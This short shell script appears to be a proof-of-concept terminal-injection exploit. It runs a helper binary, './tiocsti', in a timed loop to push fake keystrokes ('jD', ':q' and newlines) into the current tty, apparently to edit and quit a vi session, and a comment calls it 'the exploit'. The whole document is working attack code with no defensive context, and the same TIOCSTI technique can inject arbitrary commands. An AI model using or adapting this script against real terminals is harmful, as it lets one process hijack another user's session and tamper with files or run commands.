#!/bin/sh

tty=`tty`
(
        exec < $tty
        # Without some sleeping, the exploit doesn't work -- the sleeps are
        # quite long, just to be on the safe side.
        for a in '
' 'jD' '
' ':q
'; do
                sleep 1
                ./tiocsti "$a"
        done
)&
